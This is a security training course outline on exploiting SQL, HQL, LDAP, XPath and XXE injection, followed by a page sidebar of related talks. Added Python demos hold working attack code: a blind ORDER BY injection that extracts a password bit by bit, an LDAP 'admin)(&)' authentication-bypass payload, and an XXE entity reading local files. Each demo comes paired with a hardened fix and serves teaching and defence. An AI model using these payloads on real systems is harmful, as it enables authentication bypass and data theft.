The Art Of Exploiting Injection Flaws
Sumit Siddharth
sid@notsosecure.com
About the course
- Hands-on 2-day training
- Requires out-of-the-box thinking (strong coffee recommended!)
- 20 exercises, 100 slides, 8 CTFs!
- Previous feedback:
  - "This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid"
  - "I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid"
About Me
Sumit "sid" Siddharth
- Speaker/Trainer at Black Hat, DEF CON, OWASP AppSec, HITB, Ruxcon etc.
- My blog: www.notsosecure.com
- Specialist in Application & Database Security!
- More than 8 years of pentesting!
- Co-author: SQL Injection Attacks and Defense
- Head of Penetration Testing at 7Safe
Day 1: SQL Injection
Exploiting SQL Injections
- Authentication Bypass
- Extracting Data
- Error Messages Enabled
- Error Messages Disabled
- Union Injection
- Blind Injection
- Time Delays
- Out-of-Band Channels
- Privilege Escalation
- OS Code Execution
Exercise 9.8 – SQL Injection: OS Command Execution
- http://hacklab.net/hackme_7.5/
- Objective
  - Exploit SQL injection to run OS commands on the database server
  - CTF: What are the contents of C:\secret.txt on the server?
- Time
  - 10 mins
Advanced SQL Injection
- Insanely Blind SQL Injection
  - The application returns the same response whether or not the injected condition holds
- Injection point inside an INSERT/UPDATE statement
Encoding/Decoding User Input
- Base64-decoding user input
- Hex-decoding user input
- The application decodes the parameter before using it in a query, so a scanner that fuzzes the raw parameter never produces a valid decoded payload; the payload has to be encoded the same way the application expects
- Real-world examples
  - WordPress admin-ajax.php unauthenticated SQL injection
  - PHP-Nuke auth.php:
    $cookie = explode(";", urldecode(empty($_POST["cookie"])));
    $admin = base64_decode($admin);
SQL Injection in SQL Names
- Consider the following (ASP/VBScript):
Dim cat, orderBy, query
cat = Replace(Request.Form("cat"), "'", "''")
orderBy = Replace(Request.Form("orderBy"), "'", "''")
query = "SELECT * FROM prod WHERE cat = '" & cat & "' ORDER BY " & orderBy
- Doubling single quotes only protects the quoted value position (cat). orderBy is concatenated into an identifier position with no quotes around it, so the escaping does nothing there and any quote-free expression is accepted as the sort key.
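Worked example, added here and not part of the course material: a Python/sqlite3 port of the pattern above. It keeps the quote-doubling exactly as the ASP snippet does, shows that ORDER BY is still wide open, turns the row order into a boolean oracle that recovers a value from another table without a single quote in the payload, and contrasts that with an allow-list lookup for the sort column plus a bound parameter for the value. The prod and users tables, their rows and the secret are constructed for the demo; the CASE-based oracle is a general technique, not specific to the hacklab target.

```python
import sqlite3

# Constructed demo schema; the users table stands in for the data an
# attacker would want to reach from the product search.
SCHEMA = """
CREATE TABLE prod (id INTEGER PRIMARY KEY, name TEXT, cat TEXT, price REAL);
INSERT INTO prod VALUES (1, 'Apple',  'fruit', 1.20);
INSERT INTO prod VALUES (2, 'Banana', 'fruit', 0.50);
INSERT INTO prod VALUES (3, 'Cherry', 'fruit', 3.00);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret');
"""

NAME_ORDER = ["Apple", "Banana", "Cherry"]   # what ORDER BY name yields
PRICE_ORDER = ["Banana", "Apple", "Cherry"]  # what ORDER BY price yields


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def search_vulnerable(db, cat, order_by):
    """Same construction as the ASP snippet: both inputs get their quotes
    doubled, but only cat ends up inside quotes in the final statement."""
    cat = cat.replace("'", "''")
    order_by = order_by.replace("'", "''")
    sql = "SELECT name FROM prod WHERE cat = '" + cat + "' ORDER BY " + order_by
    return [row[0] for row in db.execute(sql)]


def ask(db, condition):
    """Boolean oracle through the identifier position. The payload contains no
    quote, so Replace() leaves it untouched; the sort key flips between two
    columns depending on whether the attacker's condition holds."""
    payload = "(CASE WHEN (" + condition + ") THEN name ELSE price END)"
    return search_vulnerable(db, "fruit", payload) == NAME_ORDER


def extract_password(db, max_len=32):
    """Recover users.password one character at a time by binary search on its
    code point. substr() past the end yields '' whose unicode() is NULL,
    coalesced to 0, which ends the loop."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = ("(SELECT coalesce(unicode(substr(password,%d,1)),0) "
                    "FROM users LIMIT 1) > %d" % (pos, mid))
            if ask(db, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered


# Hardened version: identifiers come from an allow-list, values are bound.
SORTABLE = {"name": "name", "price": "price", "id": "id"}


def search_hardened(db, cat, order_by):
    column = SORTABLE.get(order_by)
    if column is None:
        raise ValueError("unsupported sort column: %r" % order_by)
    sql = "SELECT name FROM prod WHERE cat = ? ORDER BY " + column
    return [row[0] for row in db.execute(sql, (cat,))]


def hardened_rejects(db, order_by):
    """True when the allow-list refuses the supplied sort key."""
    try:
        search_hardened(db, "fruit", order_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("oracle 1=1:", ask(db, "1=1"), " oracle 1=0:", ask(db, "1=0"))
    print("recovered password:", extract_password(db))
    print("hardened rejects CASE payload:",
          hardened_rejects(db, "(CASE WHEN 1=1 THEN name ELSE price END)"))
```

The hardened function never concatenates user input: the value goes through a bound parameter and the identifier is mapped through a fixed dictionary, which is the only safe way to let a client choose a column name.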
Hacking Oracle from Web
- Exploiting SQL injection against an Oracle database
- How to extract data
  - One query to get them all!
- How to execute OS code
- What if we are not DBA?
  - Become DBA
  - Execute OS code
  - Drop DBA
Capture The Flag: SQL Injection
- http://hacklab.net/ctf.asp?data=foobar
- Objective
  - What's in C:\secret.txt?
- Time
  - 20 mins!
- No instructions or hints this time!
Day 2: The Art of Exploiting Lesser Known Injection Flaws
- ORM Injection
- LDAP Injection
- Advanced LDAP Injection
- XPath Injection
- XPath 2.0
- XML Entity Injection
- Combining XPath and XXE
- CTF
- Q&A
Hibernate Query Language Injection
- User input is concatenated into the HQL string, so it reaches the underlying SQL engine unchanged:
List<Event> result = session.createQuery(
    "from Event e where e.title='" + param + "'").list();
HACKING LDAP
- LDAP overview
- LDAP injection
- Blind LDAP injection
- Hacking LDAP in practice
- Securing applications against LDAP injections
LDAP Injection: Authentication Bypass
- (&(user=username)(password=pwd))
- Usually the password is hashed and then matched against the stored value, so injection is most likely to work only in the username field
- If the password is compared as-is, a wildcard makes that clause match anything:
  (&(user=username)(password=*))
- Injecting username)(&) into the username field gives:
  (&(user=username)(&))(password=pwd))
- (&) is the absolute-true filter, so the first complete filter is (&(user=username)(&)). Anything after the first filter is ignored by OpenLDAP, so the password clause is never evaluated
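Added example, not from the course material: a small Python model of the bypass above. It builds the filter the vulnerable way and the RFC 4515-escaped way, parses the first complete filter with a minimal recursive-descent parser (emulating the "ignore whatever follows" behaviour the slide attributes to OpenLDAP), and evaluates it against a constructed directory. The directory entries, the attribute names and the assumption that password is compared as a plain attribute (so the wildcard case can be shown too) are all demo choices.

```python
import re

# Constructed directory. Password is a plain attribute here so the
# (password=*) case from the slide can be demonstrated as well.
DIRECTORY = [
    {"user": "admin", "password": "correct-horse"},
    {"user": "eric", "password": "hunter2"},
]

FILTER_TEMPLATE = "(&(user=%s)(password=%s))"


def build_filter_vulnerable(user, pwd):
    """Raw concatenation, exactly as in the slide's filter."""
    return FILTER_TEMPLATE % (user, pwd)


def escape(value):
    """RFC 4515 escaping: the five characters that carry meaning inside an
    assertion value are replaced by \\XX hex escapes."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\x00" else c for c in value)


def build_filter_hardened(user, pwd):
    return FILTER_TEMPLATE % (escape(user), escape(pwd))


def unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), value)


def parse_filter(s, i=0):
    """Recursive-descent parser for the subset (&..)(|..)(!..)(attr=value).
    Returns (ast, index just past the filter). (&) with no operands is the
    RFC 4526 absolute-true filter."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|":
        op, i, operands = s[i], i + 1, []
        while s[i] == "(":
            node, i = parse_filter(s, i)
            operands.append(node)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return (op, operands), i + 1
    if s[i] == "!":
        node, i = parse_filter(s, i + 1)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return ("!", node), i + 1
    eq = s.index("=", i)
    close = s.index(")", eq)
    return ("=", s[i:eq], s[eq + 1:close]), close + 1


def evaluate(node, entry):
    kind = node[0]
    if kind == "&":
        return all(evaluate(n, entry) for n in node[1])
    if kind == "|":
        return any(evaluate(n, entry) for n in node[1])
    if kind == "!":
        return not evaluate(node[1], entry)
    _, attr, value = node
    if attr not in entry:
        return False
    # A bare '*' is a presence match; an escaped \2a is the literal character.
    return value == "*" or entry[attr] == unescape(value)


def authenticate(filter_str, directory=DIRECTORY):
    """Emulates the server behaviour the slide describes: parse the first
    complete filter and ignore the trailing text.
    Returns (matched user or None, ignored trailing text)."""
    node, end = parse_filter(filter_str)
    trailing = filter_str[end:]
    for entry in directory:
        if evaluate(node, entry):
            return entry["user"], trailing
    return None, trailing


if __name__ == "__main__":
    for build in (build_filter_vulnerable, build_filter_hardened):
        for user, pwd in (("admin)(&)", "wrong"), ("admin", "*")):
            f = build(user, pwd)
            print("%-24s %-44s -> %s" % (build.__name__, f, authenticate(f)))
```

The interesting output is the trailing text returned for the vulnerable build: `(password=wrong))` is exactly the clause that never gets evaluated, which is why the wrong password still logs in as admin. With escaping the parenthesis and the asterisk become ordinary value bytes and neither trick works.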
Exercise 6
- http://hacklab2.net:81/ldap/selfservice/
- PHP/LDAP
- Find the telephone number of employee Eric Philip
- Time: 10 mins
XPath Injection
- Agenda
  - What is XPath
  - Exploiting XPath
  - Impact of XPath exploitation
  - Blind XPath injection
  - Automating XPath injection
  - XPath 2.0 injection
  - Insane XPath injection
  - Defending against XPath injection
XPath's XML Nomenclature
[Diagram: an annotated sample document labelling the root node, a node, node name, node value, attribute name, attribute value and a comment]
Automating XPath
- XPath Explorer
- Demo time!
XPath 2.0 Features
- Hugely increased feature set:
  - Regular expressions
  - Unicode normalization
  - String to code point conversion
  - Remote document references
- All of these can be utilised to speed up document retrieval and reduce the key space we have to search.
XPath 2.0
- Allows reading not just the current XML file but any arbitrary XML file on the file system: the doc() function takes a URI and returns that document's root.
Hacking Web Services with XML External Entity
- The XML is not validated before it is processed
- Attacker can inject an external entity:
  <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
- The web service parses the entity and the parser accesses the local resource
- Unauthorized access to information
- Port scanning
- Denial of service attack
  - Breaking the XML syntax
  - Providing files like /dev/urandom
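Added example, not part of the course material: the entity from the slide, parsed by Python's standard-library xml.sax with external general entity resolution switched on and then off. Rather than c:/boot.ini it points the entity at a temporary file it creates itself, so the run is self-contained; the secret string and the temp-file location are the constructed parts. The feature is set explicitly in both directions because older Python versions resolved external entities by default while current ones do not, and the point is to see both behaviours on the same document.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers every run of character data, including text pulled in by
    entity expansion."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def xxe_document(target_uri):
    """Attacker-supplied XML (constructed): the entity body is any URI the
    parser is willing to fetch."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE order [ <!ENTITY pwned SYSTEM "%s"> ]>\n'
        '<order><note>&pwned;</note></order>' % target_uri
    )


def parse_with_policy(xml_text, resolve_external_entities):
    """Parse xml_text; the flag maps onto the SAX feature that decides whether
    an external general entity is fetched or silently dropped."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.text()


def demo(secret="flag{constructed-secret}"):
    """Plant a secret file, then parse the same hostile document with both
    policies. Returns (text seen by the resolving parser, text seen by the
    hardened parser)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        path = Path(fh.name)
    try:
        doc = xxe_document(path.as_uri())
        return parse_with_policy(doc, True), parse_with_policy(doc, False)
    finally:
        path.unlink()


if __name__ == "__main__":
    leaked, blocked = demo()
    print("resolving parser returned:", repr(leaked))
    print("hardened parser returned: ", repr(blocked))
```

The hardened call is the whole fix for this parser: with the feature off the entity reference expands to nothing and the file is never opened. The same document pointed at http://host:port/ is the port-scanning case on the slide, and pointed at /dev/urandom it is the denial-of-service case, both of which the hardened configuration also neutralises.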
Combining XXE and XPath
- Did I say, with XPath 2.0 you can read arbitrary XML files on the file system?
- I actually mean:
  - with XPath 2.0 you can read arbitrary XML files on the file system.
- Introducing Xcat
Thank You!
- Questions please...
- sid@notsosecure.com
- Twitter: notsosecure

More Related Content

What's hot

The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation Framework
Francis Alexander
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
OWASP Delhi
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
Iftach Ian Amit
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
SecuRing
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
nettitude_labs
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
Mike Felch
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 

What's hot (20)

The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
NoSQL Exploitation Framework
NoSQL Exploitation FrameworkNoSQL Exploitation Framework
NoSQL Exploitation Framework
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 

Viewers also liked

масштаб
масштабмасштаб
масштаб
bk-kris
 
Why Local Social? October 2013
Why Local Social? October 2013Why Local Social? October 2013
Why Local Social? October 2013
Engage121
 
맞춤형 창업특강 11월
맞춤형 창업특강 11월맞춤형 창업특강 11월
맞춤형 창업특강 11월
Woonghee Lee
 
Power point tour shape editing
Power point tour shape editingPower point tour shape editing
Power point tour shape editing
Osama Adel
 
1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra
Flakoo Nganga
 
Why Local Social? - November 2013
Why Local Social? - November 2013Why Local Social? - November 2013
Why Local Social? - November 2013
Engage121
 
Wk4
Wk4Wk4
E121 local social marketing (complete)
E121 local social marketing (complete)E121 local social marketing (complete)
E121 local social marketing (complete)
Engage121
 
Engage121 overview of campaigns - june 2014
Engage121   overview of campaigns - june 2014Engage121   overview of campaigns - june 2014
Engage121 overview of campaigns - june 2014
Engage121
 
Presentation1
Presentation1Presentation1
Presentation1
Relyn Estacion
 
признаки делимости
признаки делимостипризнаки делимости
признаки делимости
bk-kris
 
Credit and background info
Credit and background infoCredit and background info
Credit and background info
Christopher Shearer
 
El62013
El62013El62013
El62013
ksanhn
 
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets) Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121
 
Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...
APOYO Escolar _en línea
 
11810個人報告
11810個人報告11810個人報告
11810個人報告
怡妏 劉
 
Presentation3
Presentation3Presentation3
Presentation3
Relyn Estacion
 
Engage121 overview latest june 2014
Engage121 overview latest june 2014Engage121 overview latest june 2014
Engage121 overview latest june 2014
Engage121
 

Viewers also liked (18)

масштаб
масштабмасштаб
масштаб
 
Why Local Social? October 2013
Why Local Social? October 2013Why Local Social? October 2013
Why Local Social? October 2013
 
맞춤형 창업특강 11월
맞춤형 창업특강 11월맞춤형 창업특강 11월
맞춤형 창업특강 11월
 
Power point tour shape editing
Power point tour shape editingPower point tour shape editing
Power point tour shape editing
 
1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra1. bullying aproximacion al fenomeno onederra
1. bullying aproximacion al fenomeno onederra
 
Why Local Social? - November 2013
Why Local Social? - November 2013Why Local Social? - November 2013
Why Local Social? - November 2013
 
Wk4
Wk4Wk4
Wk4
 
E121 local social marketing (complete)
E121 local social marketing (complete)E121 local social marketing (complete)
E121 local social marketing (complete)
 
Engage121 overview of campaigns - june 2014
Engage121   overview of campaigns - june 2014Engage121   overview of campaigns - june 2014
Engage121 overview of campaigns - june 2014
 
Presentation1
Presentation1Presentation1
Presentation1
 
признаки делимости
признаки делимостипризнаки делимости
признаки делимости
 
Credit and background info
Credit and background infoCredit and background info
Credit and background info
 
El62013
El62013El62013
El62013
 
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets) Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
Engage121 Local Social Success Stories - Clothing Retail (Plato's Closets)
 
Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...Trabajando con nuevos enfoques ...
Trabajando con nuevos enfoques ...
 
11810個人報告
11810個人報告11810個人報告
11810個人報告
 
Presentation3
Presentation3Presentation3
Presentation3
 
Engage121 overview latest june 2014
Engage121 overview latest june 2014Engage121 overview latest june 2014
Engage121 overview latest june 2014
 

Similar to Injection flaw teaser

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection  How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
Janith Malinga
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
Caleb Sima
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
Nazar Tymoshyk, CEH, Ph.D.
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
Mudassir Hassan Khan
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
n|u - The Open Security Community
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Network security
Network securityNetwork security
NetworkSecurity
NetworkSecurityNetworkSecurity
NetworkSecurity
Peter Lawrence
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
Sqreen
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
Soumyasanto Sen
 

Similar to Injection flaw teaser (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection  How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Google Dorks and SQL Injection
Google Dorks and SQL InjectionGoogle Dorks and SQL Injection
Google Dorks and SQL Injection
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
Network security
Network securityNetwork security
Network security
 
NetworkSecurity
NetworkSecurityNetworkSecurity
NetworkSecurity
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
